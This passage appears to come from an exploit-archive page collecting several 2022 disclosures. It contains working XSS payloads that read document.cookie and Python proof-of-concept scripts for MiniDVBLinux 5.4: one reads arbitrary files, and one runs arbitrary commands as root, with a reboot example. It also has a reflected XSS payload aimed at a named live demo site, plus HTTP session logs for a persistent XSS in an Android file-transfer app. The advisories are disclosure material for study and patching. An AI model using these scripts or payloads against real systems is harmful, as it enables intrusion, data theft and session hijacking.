2021 5:02 PM</td></tr><tr role="row" class="even"><td>111</td><td>Admin updated user<br /><strong>Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><br /><tr role="row" class="odd"><td>110</td><td>Admin deleted user <strong>a</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><tr role="row" class="even"><br /><td>109</td><td>Admin updated user <strong>a</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><tr role="row" class="odd"><td>108</td><br /><td>Admin created user <strong>a"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:56 PM</td><br /></tr><tr role="row" class="even"><td>107</td><td>Admin updated user <strong>Pippo</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:56 PM</td></tr><br /><tr role="row" class="odd"><td>106</td><td>Admin updated user <strong>Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong><br />successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:52 PM</td></tr><tr role="row" class="even"><td>105</td><br /><td>Admin updated user <strong>Pippo>"<iframe src="evil.source" onload="alert(document.cookie)"></iframe></strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:52 PM</td></tr></tbody><br /></table></div><div class="row"><div class="col-md-5 col-sm-5"><div class="dataTables_info" id="activity_info"<br />role="status" aria-live="polite">Showing 1 to 10 of 100 records</div></div><div class="col-md-7 col-sm-7"><div class="dataTables_paginate paging_bootstrap_full_number"<br />id="activity_paginate"><ul class="pagination" style="visibility: visible;"><li class="prev disabled"><a href="#" title="First"><i class="fa fa-angle-double-left"></i></a><br /></li><li class="prev disabled"><a href="#" title="Prev"><i class="fa fa-angle-left"></i></a></li><li class="active"><a href="#">1</a></li><li><a href="#">2</a></li><br /><li><a href="#">3</a></li><li><a href="#">4</a></li><li><a href="#">5</a></li><li class="next"><a href="#" title="Next"><i class="fa fa-angle-right"></i></a></li><br /><li class="next"><a href="#" title="Last"><i class="fa fa-angle-double-right"></i></a></li></ul></div></div></div></div><br /></div><br /></div><br /><br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The persistent xss web vulnerability can be resolved by the following steps ...<br />1. Restrict the input fields of the name parameter to disallow special chars for the registration and update account information<br />2. Encode and escape the content of the name parameter to sanitize the registration and update account information<br />3. Sanitize and filter the output locations of the users and the activity log list modules<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># MiniDVBLinux 5.4 Arbitrary File Read Vulnerability<br />#<br />#<br /># Vendor: MiniDVBLinux<br /># Product web page: https://www.minidvblinux.de<br /># Affected version: <=5.4<br />#<br /># Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br /># way to convert a standard PC into a Multi Media Centre based on the<br /># Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br /># Linux based Digital Video Recorder: Watch TV, Timer controlled<br /># recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br /># via browser, and a lot more. MLD strives to be as small as possible,<br /># modular, simple. It supports numerous hardware platforms, like classic<br /># desktops in 32/64bit and also various low power ARM systems.<br />#<br /># Desc: The distribution suffers from an arbitrary file disclosure<br /># vulnerability. Using the 'file' GET parameter attackers can disclose<br /># arbitrary files on the affected device and disclose sensitive and system<br /># information.<br />#<br /># Tested on: MiniDVBLinux 5.4<br /># BusyBox v1.25.1<br /># Architecture: armhf, armhf-rpi2<br /># GNU/Linux 4.19.127.203 (armv7l)<br /># VideoDiskRecorder 2.4.6<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5719<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php<br />#<br />#<br /># 24.09.2022<br />#<br /><br />import requests<br />import re,sys<br /><br />#test case 001<br />#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT<br /><br />if len(sys.argv) < 3:<br /> print('MiniDVBLinux 5.4 File Disclosure PoC')<br /> print('Usage: ./mldhd_fd.py [url] [file]')<br /> sys.exit(17)<br />else:<br /> url = sys.argv[1]<br /> fil = sys.argv[2]<br /><br />req = requests.get(url+'/?site=about&name=ZSL&file='+fil)<br />outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()<br />print(outz.replace('<pre>','').replace('</pre>',''))<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : wordpress.org/plugins/ │<br />│ Vendor : Photo Gallery Team - wpsofts.com │<br />│ Software : WordPress Photo Gallery 1.8.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />URL parameter 'pg' is vulnerable to XSS<br /><br />Path: /photo-gallery/<br /><br />https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1<br /><br /><br />URL parameter 'pid' is vulnerable to XSS<br /><br />Path: /photo-gallery/<br /><br />https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability<br />#<br />#<br /># Vendor: MiniDVBLinux<br /># Product web page: https://www.minidvblinux.de<br /># Affected version: <=5.4<br />#<br /># Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br /># way to convert a standard PC into a Multi Media Centre based on the<br /># Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br /># Linux based Digital Video Recorder: Watch TV, Timer controlled<br /># recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br /># via browser, and a lot more. MLD strives to be as small as possible,<br /># modular, simple. It supports numerous hardware platforms, like classic<br /># desktops in 32/64bit and also various low power ARM systems.<br />#<br /># Desc: The application suffers from an OS command execution vulnerability.<br /># This can be exploited to execute arbitrary commands as root, through the<br /># 'command' GET parameter in /tpl/commands.sh.<br />#<br /># Tested on: MiniDVBLinux 5.4<br /># BusyBox v1.25.1<br /># Architecture: armhf, armhf-rpi2<br /># GNU/Linux 4.19.127.203 (armv7l)<br /># VideoDiskRecorder 2.4.6<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5718<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php<br />#<br />#<br /># 24.09.2022<br />#<br /><br />import requests<br />import re,sys<br /><br />#test case 002<br />#http://ip:8008/?site=commands&section=system&command=sleep%201;reboot<br />#-<br />#test case 003<br />#http://ip:8008/?site=commands&section=system&command=id<br />#uid=0(root) gid=0(root)<br /><br />if len(sys.argv) < 3:<br /> print('MiniDVBLinux 5.4 Command Execution PoC')<br /> print('Usage: ./mldhd_root1.py [url] [cmd]')<br /> sys.exit(17)<br />else:<br /> url = sys.argv[1]<br /> cmd = sys.argv[2]<br /><br />req = requests.get(url+'/?site=commands&section=system&command='+cmd)<br />req = requests.get(url+'/?site=commands&section=system&command='+cmd)<br />outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group()<br />print(outz.replace('log\'>','').replace('</pre>',''))<br /></code></pre>
<pre><code>Document Title:<br />===============<br />WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2322<br /><br /><br />Release Date:<br />=============<br />2022-10-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2322<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.6<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.<br /><br />Affected Product(s):<br />====================<br />smarterDroid<br />Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-10-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Open Authentication (Anonymous Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application<br />requests from the application-side.<br /><br />The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.<br />Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent<br />attack vector via post method request.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external<br />redirects to malicious source and persistent manipulation of affected application modules.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.<br />For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.<br /><br /><br />Manual reproduce of the vulnerability ...<br />1. Install the mobile android application and start it<br />2. Start the wifi web-server<br />3. Login as attacker by the browser over the network<br />4. Inject payload as folder name, file name or zip file and save via post method request<br />5. The payload executes in the web ui when previewing the paths<br /><br /><br />Exploitation: Payload<br /><a onmouseover=alert(document.cookie)>picture1337.jpg</a><br /><br /><br />--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---<br />http://localhost:1234/storage/emulated/0/DCIM/<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676<br />Content-Length: 613<br />Origin:http://localhost:1234<br />Connection: keep-alive<br />Referer:http://localhost:1234/storage/emulated/0/DCIM/<br />action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/<br />-<br />POST: HTTP/1.1 302 OK<br />Connection: Close<br />Content-Type: text/html<br />Location:http://localhost:1234/storage/emulated/0/DCIM/<br />Content-Length: 143<br />-<br />http://localhost:1234/storage/emulated/0/DCIM/<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Referer:http://localhost:1234/storage/emulated/0/DCIM/<br />Connection: keep-alive<br />-<br />POST: HTTP/1.1 200 OK<br />Connection: Close<br />Content-Type: text/html<br /><br /><br />--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---<br />http://localhost:1234/storage/emulated/0/Pictures/?<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045<br />Content-Length: 882<br />Origin:http://localhost:1234<br />Connection: keep-alive<br />Referer:http://localhost:1234/storage/emulated/0/Pictures/?<br />Upgrade-Insecure-Requests: 1<br />action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file<br />-<br />POST: HTTP/1.1 200 OK<br />Connection: Close<br />Content-Type: text/html<br />Location:http://localhost:1234/storage/emulated/0/Pictures/<br />Content-Length: 151<br />-<br />http://localhost:1234/storage/emulated/0/Pictures/<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Referer:http://localhost:1234/storage/emulated/0/Pictures/?<br />Connection: keep-alive<br />Upgrade-Insecure-Requests: 1<br />-<br />POST: HTTP/1.1 200 OK<br />Connection: Close<br />Content-Type: text/html<br /><br /><br />Reference(s):<br />http://localhost:1234/<br />http://localhost:1234/storage/<br />http://localhost:1234/storage/emulated/<br />http://localhost:1234/storage/emulated/0/<br />http://localhost:1234/storage/emulated/0/DCIM/<br />http://localhost:1234/storage/emulated/0/Pictures/<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The persistent web vulnerabilities can be resolved by the following steps ...<br />1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process<br />2. Encode and escape the content of the data_file parameter to sanitize the content<br />3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>